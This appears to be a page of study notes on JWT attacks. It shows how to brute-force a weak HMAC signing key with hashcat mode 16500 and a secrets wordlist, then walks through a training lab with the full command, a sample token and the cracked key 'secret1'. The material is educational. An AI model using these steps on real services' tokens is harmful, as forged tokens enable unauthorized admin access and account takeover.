Brute-forcing Secret Keys

List with well-known secrets: jwt.secrets.list.

We can brute-force a JWT as follows (16500 -> JWT).

hashcat -a 0 -m 16500 <jwt> <wordlist>

Hashcat signs the header and payload from the JWT using each wordlist secret and compares the resulting signature with the original one.

LAB: JWT Authentication Bypass via Weak Singing Key

Goal: Brute-force the website's secret key, access /admin, and delete carlos.

$ hashcat -a 0 -m 16500 eyJraWQiOiI2ZmIyYjNhYS1lMzA1LTRlN2UtOTc2NC04ZTJjOGI0MmEzZDUiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTcxODAyODAyNiwic3ViIjoid2llbmVyIn0.c6A-cb8_r6JqIuBvZSl09tPYr6F7Zhii8lJsF2QkFjQ jwt.secrets.list

<SNIP>
eyJ...<SNIP>...FjQ:secret1
<SNIP>

This can be also done using the Burp's JWT Editor extension.

PreviousFlawed Signature Verfication NextJWT Header Parameter Injections

Last updated 1 year ago